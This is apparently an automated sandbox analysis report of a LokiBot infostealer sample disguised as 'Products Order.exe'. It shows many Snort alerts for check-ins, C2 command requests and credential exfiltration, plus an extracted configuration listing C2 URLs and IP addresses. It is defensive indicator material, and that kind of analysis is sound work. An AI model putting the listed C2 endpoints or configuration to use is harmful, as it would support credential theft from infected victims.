ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:16.803035
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:47.452852
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:21.430034
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:29.556038
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:21.430034
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:35.693093
SID:	2021641
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:52.383820
SID:	2025381
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:12.750490
SID:	2825766
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:55.010656
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:27.085627
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:09.170149
SID:	2024318
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:01.356159
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:00.746100
SID:	2025381
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:03.239293
SID:	2825766
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:19.541569
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:23.839877
SID:	2025483
Source Port:	80
Destination Port:	49760
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:27.575264
SID:	2025483
Source Port:	80
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:53.120055
SID:	2025381
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:12.750490
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:41.388891
SID:	2825766
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:26.257152
SID:	2025483
Source Port:	80
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:19.223879
SID:	2025483
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:37.577907
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:47.045718
SID:	2825766
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:00.746100
SID:	2021641
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:10.859696
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:25.211849
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:37.130221
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:13.504816
SID:	2025483
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:15.418885
SID:	2025483
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:08.955748
SID:	2024313
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:25.211849
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:04.537805
SID:	2825766
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:47.452852
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:34.303762
SID:	2025483
Source Port:	80
Destination Port:	49765
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:07.254938
SID:	2021641
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:56.970973
SID:	2025381
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:08.955748
SID:	2024318
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:41.744488
SID:	2021641
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:18.705946
SID:	2025381
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:38.095021
SID:	2025483
Source Port:	80
Destination Port:	49767
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:39.999092
SID:	2025483
Source Port:	80
Destination Port:	49768
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:43.272420
SID:	2024318
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:37.577907
SID:	2024318
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:43.272420
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:57.099162
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:03.239293
SID:	2024318
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:19.541569
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:41.388891
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:03.239293
SID:	2024313
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:52.000180
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:02.627302
SID:	2024313
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:10.859696
SID:	2825766
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:16.803035
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:21.430034
SID:	2825766
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:02.627302
SID:	2024318
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:39.485062
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:27.656502
SID:	2825766
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:07.254938
SID:	2825766
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:23.884685
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:47.045718
SID:	2025381
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:33.315004
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:15.699411
SID:	2021641
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:07.071740
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:33.315004
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:39.485062
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:55.076784
SID:	2025381
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:45.530428
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:20.628600
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:07.071740
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:45.530428
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:12.990169
SID:	2024318
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:41.744488
SID:	2825766
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:42.248026
SID:	2025483
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:07.563893
SID:	2025483
Source Port:	80
Destination Port:	49751
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:50.619828
SID:	2025483
Source Port:	80
Destination Port:	49773
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:04.537805
SID:	2021641
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:23.884685
SID:	2825766
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:47.452852
SID:	2825766
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:51.232610
SID:	2825766
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:35.199755
SID:	2825766
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:54.264582
SID:	2021641
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:45.151548
SID:	2825766
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:58.862053
SID:	2024318
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:00.746100
SID:	2825766
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:21.924787
SID:	2025483
Source Port:	80
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:31.926842
SID:	2025483
Source Port:	80
Destination Port:	49732
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:12.990169
SID:	2024313
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:58.862053
SID:	2024313
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:45.151548
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:49.343817
SID:	2024313
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:15.699411
SID:	2825766
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:17.603710
SID:	2025381
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:39.020338
SID:	2024318
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:49.343817
SID:	2024318
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:33.811515
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:27.085627
SID:	2825766
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:27.656502
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:28.951650
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:03.138281
SID:	2025483
Source Port:	80
Destination Port:	49710
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:11.067189
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:21.430034
SID:	2021641
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:14.907253
SID:	2021641
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:39.020338
SID:	2024313
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Products Order.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://kbfvzoboss.bid/alien/fre.php	Sophos S4: Label: malware callhome uri
Source: 45.90.57.51/big/five/fre.php	Sophos S4: Label: malware callhome uri
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	Sophos S4: Label: malware callhome uri
Source: http://45.90.57.51/big/five/fre.php	Sophos S4: Label: malware callhome uri
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	Sophos S4: Label: malware callhome uri
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	Sophos S4: Label: malware callhome uri
Source: 45.90.57.51/big/five/fre.php	Avira URL Cloud: Label: malware
Source: http://45.90.57.51/big/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.90.57.51/big/five/fre.php"]}

Machine Learning detection for sample

Source: Products Order.exe

Joe Sandbox ML: detected

Source: Products Order.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Products Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Skidomoney.pdb source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204619498.0000000000012000.00000002.00000001.01000000.00000007.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49704 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49704 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49704 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49704 -> 45.90.57.51:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49704 -> 45.90.57.51:80
